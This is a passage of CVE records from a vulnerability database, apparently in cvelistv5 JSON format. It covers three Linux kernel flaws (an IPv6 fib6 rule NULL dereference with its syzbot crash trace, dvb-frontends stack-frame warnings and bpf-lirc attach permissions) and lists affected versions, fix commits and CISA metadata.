RDX: 0000000000000003 RSI: ffffffff8bcac4e0 RDI: ffffffff8c1f9760
RBP: ffff8880673fb980 R08: ffffffff8fac15ef R09: 1ffffffff1f582bd
R10: dffffc0000000000 R11: fffffbfff1f582be R12: dffffc0000000000
R13: 0000000000000080 R14: ffff888076509000 R15: ffff88807a029a00
FS: 00007f55e82ca6c0(0000) GS:ffff8880b9400000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000001b31d23000 CR3: 0000000022b66000 CR4: 00000000003506f0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Call Trace:
<TASK>
fib_rules_lookup+0x62c/0xdb0 net/core/fib_rules.c:317
fib6_rule_lookup+0x1fd/0x790 net/ipv6/fib6_rules.c:108
ip6_route_output_flags_noref net/ipv6/route.c:2637 [inline]
ip6_route_output_flags+0x38e/0x610 net/ipv6/route.c:2649
ip6_route_output include/net/ip6_route.h:93 [inline]
ip6_dst_lookup_tail+0x189/0x11a0 net/ipv6/ip6_output.c:1120
ip6_dst_lookup_flow+0xb9/0x180 net/ipv6/ip6_output.c:1250
sctp_v6_get_dst+0x792/0x1e20 net/sctp/ipv6.c:326
sctp_transport_route+0x12c/0x2e0 net/sctp/transport.c:455
sctp_assoc_add_peer+0x614/0x15c0 net/sctp/associola.c:662
sctp_connect_new_asoc+0x31d/0x6c0 net/sctp/socket.c:1099
__sctp_connect+0x66d/0xe30 net/sctp/socket.c:1197
sctp_connect net/sctp/socket.c:4819 [inline]
sctp_inet_connect+0x149/0x1f0 net/sctp/socket.c:4834
__sys_connect_file net/socket.c:2048 [inline]
__sys_connect+0x2df/0x310 net/socket.c:2065
__do_sys_connect net/socket.c:2075 [inline]
__se_sys_connect net/socket.c:2072 [inline]
__x64_sys_connect+0x7a/0x90 net/socket.c:2072
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xf5/0x240 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x77/0x7f
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 5e5f3f0f801321078c897a5de0b4b4304f234da0 Version: 5e5f3f0f801321078c897a5de0b4b4304f234da0 Version: 5e5f3f0f801321078c897a5de0b4b4304f234da0 Version: 5e5f3f0f801321078c897a5de0b4b4304f234da0 Version: 5e5f3f0f801321078c897a5de0b4b4304f234da0 Version: 5e5f3f0f801321078c897a5de0b4b4304f234da0 Version: 5e5f3f0f801321078c897a5de0b4b4304f234da0 Version: 5e5f3f0f801321078c897a5de0b4b4304f234da0 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36902",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-30T18:53:30.406857Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:02.730Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-09-26T15:03:09.186Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4a5a573387da6a6b23a4cc62147453ff1bc32afa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ddec23f206a944c73bcc2724358b85388837daff"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/674c951ab8a23f7aff9b4c3f2f865901bc76a290"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/35297fc68de36826087e976f86a5b1f94fd0bf95"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7e3242c139c38e60844638e394c2877b16b396b0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8745a8d74ba17dafe72b6ab461fa6c007d879747"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1876881c9a49613b5249fb400cbf53412d90cb09"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d101291b2681e5ab938554e3e323f7a7ee33e3aa"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240926-0002/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/fib6_rules.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4a5a573387da6a6b23a4cc62147453ff1bc32afa",
"status": "affected",
"version": "5e5f3f0f801321078c897a5de0b4b4304f234da0",
"versionType": "git"
},
{
"lessThan": "ddec23f206a944c73bcc2724358b85388837daff",
"status": "affected",
"version": "5e5f3f0f801321078c897a5de0b4b4304f234da0",
"versionType": "git"
},
{
"lessThan": "674c951ab8a23f7aff9b4c3f2f865901bc76a290",
"status": "affected",
"version": "5e5f3f0f801321078c897a5de0b4b4304f234da0",
"versionType": "git"
},
{
"lessThan": "35297fc68de36826087e976f86a5b1f94fd0bf95",
"status": "affected",
"version": "5e5f3f0f801321078c897a5de0b4b4304f234da0",
"versionType": "git"
},
{
"lessThan": "7e3242c139c38e60844638e394c2877b16b396b0",
"status": "affected",
"version": "5e5f3f0f801321078c897a5de0b4b4304f234da0",
"versionType": "git"
},
{
"lessThan": "8745a8d74ba17dafe72b6ab461fa6c007d879747",
"status": "affected",
"version": "5e5f3f0f801321078c897a5de0b4b4304f234da0",
"versionType": "git"
},
{
"lessThan": "1876881c9a49613b5249fb400cbf53412d90cb09",
"status": "affected",
"version": "5e5f3f0f801321078c897a5de0b4b4304f234da0",
"versionType": "git"
},
{
"lessThan": "d101291b2681e5ab938554e3e323f7a7ee33e3aa",
"status": "affected",
"version": "5e5f3f0f801321078c897a5de0b4b4304f234da0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv6/fib6_rules.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.26"
},
{
"lessThan": "2.6.26",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: fib6_rules: avoid possible NULL dereference in fib6_rule_action()\n\nsyzbot is able to trigger the following crash [1],\ncaused by unsafe ip6_dst_idev() use.\n\nIndeed ip6_dst_idev() can return NULL, and must always be checked.\n\n[1]\n\nOops: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] PREEMPT SMP KASAN PTI\nKASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]\nCPU: 0 PID: 31648 Comm: syz-executor.0 Not tainted 6.9.0-rc4-next-20240417-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024\n RIP: 0010:__fib6_rule_action net/ipv6/fib6_rules.c:237 [inline]\n RIP: 0010:fib6_rule_action+0x241/0x7b0 net/ipv6/fib6_rules.c:267\nCode: 02 00 00 49 8d 9f d8 00 00 00 48 89 d8 48 c1 e8 03 42 80 3c 20 00 74 08 48 89 df e8 f9 32 bf f7 48 8b 1b 48 89 d8 48 c1 e8 03 \u003c42\u003e 80 3c 20 00 74 08 48 89 df e8 e0 32 bf f7 4c 8b 03 48 89 ef 4c\nRSP: 0018:ffffc9000fc1f2f0 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: 0000000000000000 RCX: 1a772f98c8186700\nRDX: 0000000000000003 RSI: ffffffff8bcac4e0 RDI: ffffffff8c1f9760\nRBP: ffff8880673fb980 R08: ffffffff8fac15ef R09: 1ffffffff1f582bd\nR10: dffffc0000000000 R11: fffffbfff1f582be R12: dffffc0000000000\nR13: 0000000000000080 R14: ffff888076509000 R15: ffff88807a029a00\nFS: 00007f55e82ca6c0(0000) GS:ffff8880b9400000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000001b31d23000 CR3: 0000000022b66000 CR4: 00000000003506f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cTASK\u003e\n fib_rules_lookup+0x62c/0xdb0 net/core/fib_rules.c:317\n fib6_rule_lookup+0x1fd/0x790 net/ipv6/fib6_rules.c:108\n ip6_route_output_flags_noref net/ipv6/route.c:2637 [inline]\n ip6_route_output_flags+0x38e/0x610 net/ipv6/route.c:2649\n ip6_route_output include/net/ip6_route.h:93 [inline]\n ip6_dst_lookup_tail+0x189/0x11a0 net/ipv6/ip6_output.c:1120\n ip6_dst_lookup_flow+0xb9/0x180 net/ipv6/ip6_output.c:1250\n sctp_v6_get_dst+0x792/0x1e20 net/sctp/ipv6.c:326\n sctp_transport_route+0x12c/0x2e0 net/sctp/transport.c:455\n sctp_assoc_add_peer+0x614/0x15c0 net/sctp/associola.c:662\n sctp_connect_new_asoc+0x31d/0x6c0 net/sctp/socket.c:1099\n __sctp_connect+0x66d/0xe30 net/sctp/socket.c:1197\n sctp_connect net/sctp/socket.c:4819 [inline]\n sctp_inet_connect+0x149/0x1f0 net/sctp/socket.c:4834\n __sys_connect_file net/socket.c:2048 [inline]\n __sys_connect+0x2df/0x310 net/socket.c:2065\n __do_sys_connect net/socket.c:2075 [inline]\n __se_sys_connect net/socket.c:2072 [inline]\n __x64_sys_connect+0x7a/0x90 net/socket.c:2072\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xf5/0x240 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x77/0x7f"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:11:43.599Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4a5a573387da6a6b23a4cc62147453ff1bc32afa"
},
{
"url": "https://git.kernel.org/stable/c/ddec23f206a944c73bcc2724358b85388837daff"
},
{
"url": "https://git.kernel.org/stable/c/674c951ab8a23f7aff9b4c3f2f865901bc76a290"
},
{
"url": "https://git.kernel.org/stable/c/35297fc68de36826087e976f86a5b1f94fd0bf95"
},
{
"url": "https://git.kernel.org/stable/c/7e3242c139c38e60844638e394c2877b16b396b0"
},
{
"url": "https://git.kernel.org/stable/c/8745a8d74ba17dafe72b6ab461fa6c007d879747"
},
{
"url": "https://git.kernel.org/stable/c/1876881c9a49613b5249fb400cbf53412d90cb09"
},
{
"url": "https://git.kernel.org/stable/c/d101291b2681e5ab938554e3e323f7a7ee33e3aa"
}
],
"title": "ipv6: fib6_rules: avoid possible NULL dereference in fib6_rule_action()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36902",
"datePublished": "2024-05-30T15:29:04.298Z",
"dateReserved": "2024-05-30T15:25:07.066Z",
"dateUpdated": "2025-05-04T09:11:43.599Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27075 (GCVE-0-2024-27075)
Vulnerability from cvelistv5
Published
2024-05-01 13:04
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: dvb-frontends: avoid stack overflow warnings with clang
A previous patch worked around a KASAN issue in stv0367, now a similar
problem showed up with clang:
drivers/media/dvb-frontends/stv0367.c:1222:12: error: stack frame size (3624) exceeds limit (2048) in 'stv0367ter_set_frontend' [-Werror,-Wframe-larger-than]
1214 | static int stv0367ter_set_frontend(struct dvb_frontend *fe)
Rework the stv0367_writereg() function to be simpler and mark both
register access functions as noinline_for_stack so the temporary
i2c_msg structures do not get duplicated on the stack when KASAN_STACK
is enabled.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e Version: 3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e Version: 3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e Version: 3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e Version: 3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e Version: 3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e Version: 3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e Version: 3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e Version: 3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e Version: dc4bc70259daba144f799e40a99413a86c601006 Version: d1d85ae79d5e5592dccba6890658c0999b864ddc Version: ad91b2e392be4339e09eefd8479675b4232ddfa1 Version: ec1eeaf5b6c12b561d9a90588987e44a2e2f8b1a |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27075",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-18T19:39:34.512362Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-18T19:39:53.100Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:27:57.815Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c073c8cede5abd3836e83d70d72606d11d0759d4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fa8b472952ef46eb632825051078c21ce0cafe55"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fb07104a02e87c06c39914d13ed67fd8f839ca82"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d20b64f156de5d10410963fe238d82a4e7e97a2f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/107052a8cfeff3a97326277192b4f052e4860a8a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8fad9c5bb00d3a9508d18bbfe832e33a47377730"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d6b4895197ab5a47cb81c6852d49320b05052960"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ed514ecf4f29c80a2f09ae3c877059b401efe893"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7a4cf27d1f0538f779bf31b8c99eda394e277119"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/dvb-frontends/stv0367.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c073c8cede5abd3836e83d70d72606d11d0759d4",
"status": "affected",
"version": "3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e",
"versionType": "git"
},
{
"lessThan": "fa8b472952ef46eb632825051078c21ce0cafe55",
"status": "affected",
"version": "3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e",
"versionType": "git"
},
{
"lessThan": "fb07104a02e87c06c39914d13ed67fd8f839ca82",
"status": "affected",
"version": "3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e",
"versionType": "git"
},
{
"lessThan": "d20b64f156de5d10410963fe238d82a4e7e97a2f",
"status": "affected",
"version": "3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e",
"versionType": "git"
},
{
"lessThan": "107052a8cfeff3a97326277192b4f052e4860a8a",
"status": "affected",
"version": "3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e",
"versionType": "git"
},
{
"lessThan": "8fad9c5bb00d3a9508d18bbfe832e33a47377730",
"status": "affected",
"version": "3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e",
"versionType": "git"
},
{
"lessThan": "d6b4895197ab5a47cb81c6852d49320b05052960",
"status": "affected",
"version": "3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e",
"versionType": "git"
},
{
"lessThan": "ed514ecf4f29c80a2f09ae3c877059b401efe893",
"status": "affected",
"version": "3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e",
"versionType": "git"
},
{
"lessThan": "7a4cf27d1f0538f779bf31b8c99eda394e277119",
"status": "affected",
"version": "3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e",
"versionType": "git"
},
{
"status": "affected",
"version": "dc4bc70259daba144f799e40a99413a86c601006",
"versionType": "git"
},
{
"status": "affected",
"version": "d1d85ae79d5e5592dccba6890658c0999b864ddc",
"versionType": "git"
},
{
"status": "affected",
"version": "ad91b2e392be4339e09eefd8479675b4232ddfa1",
"versionType": "git"
},
{
"status": "affected",
"version": "ec1eeaf5b6c12b561d9a90588987e44a2e2f8b1a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/dvb-frontends/stv0367.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.16"
},
{
"lessThan": "4.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.4.168",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.9.82",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.15.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-frontends: avoid stack overflow warnings with clang\n\nA previous patch worked around a KASAN issue in stv0367, now a similar\nproblem showed up with clang:\n\ndrivers/media/dvb-frontends/stv0367.c:1222:12: error: stack frame size (3624) exceeds limit (2048) in \u0027stv0367ter_set_frontend\u0027 [-Werror,-Wframe-larger-than]\n 1214 | static int stv0367ter_set_frontend(struct dvb_frontend *fe)\n\nRework the stv0367_writereg() function to be simpler and mark both\nregister access functions as noinline_for_stack so the temporary\ni2c_msg structures do not get duplicated on the stack when KASAN_STACK\nis enabled."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:28.632Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c073c8cede5abd3836e83d70d72606d11d0759d4"
},
{
"url": "https://git.kernel.org/stable/c/fa8b472952ef46eb632825051078c21ce0cafe55"
},
{
"url": "https://git.kernel.org/stable/c/fb07104a02e87c06c39914d13ed67fd8f839ca82"
},
{
"url": "https://git.kernel.org/stable/c/d20b64f156de5d10410963fe238d82a4e7e97a2f"
},
{
"url": "https://git.kernel.org/stable/c/107052a8cfeff3a97326277192b4f052e4860a8a"
},
{
"url": "https://git.kernel.org/stable/c/8fad9c5bb00d3a9508d18bbfe832e33a47377730"
},
{
"url": "https://git.kernel.org/stable/c/d6b4895197ab5a47cb81c6852d49320b05052960"
},
{
"url": "https://git.kernel.org/stable/c/ed514ecf4f29c80a2f09ae3c877059b401efe893"
},
{
"url": "https://git.kernel.org/stable/c/7a4cf27d1f0538f779bf31b8c99eda394e277119"
}
],
"title": "media: dvb-frontends: avoid stack overflow warnings with clang",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27075",
"datePublished": "2024-05-01T13:04:44.494Z",
"dateReserved": "2024-02-19T14:20:24.217Z",
"dateUpdated": "2025-05-04T12:55:28.632Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52642 (GCVE-0-2023-52642)
Vulnerability from cvelistv5
Published
2024-04-17 09:43
Modified
2025-05-04 07:40
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: rc: bpf attach/detach requires write permission
Note that bpf attach/detach also requires CAP_NET_ADMIN.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52642",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T19:25:30.519219Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T19:25:38.681Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.329Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/93d8109bf182510629bbefc8cd45296d2393987f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d98210108e7b2ff64b332b0a3541c8ad6a0617b0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9f6087851ec6dce5b15f694aeaf3e8ec8243224e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/93136132d1b5792bf44151e3494ae3691cd738e8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/caf2da1d4562de4e35eedec0be2b7f1ee25d83be"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6a9d552483d50953320b9d3b57abdee8d436f23f"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/rc/bpf-lirc.c",
"drivers/media/rc/lirc_dev.c",
"drivers/media/rc/rc-core-priv.h"
],
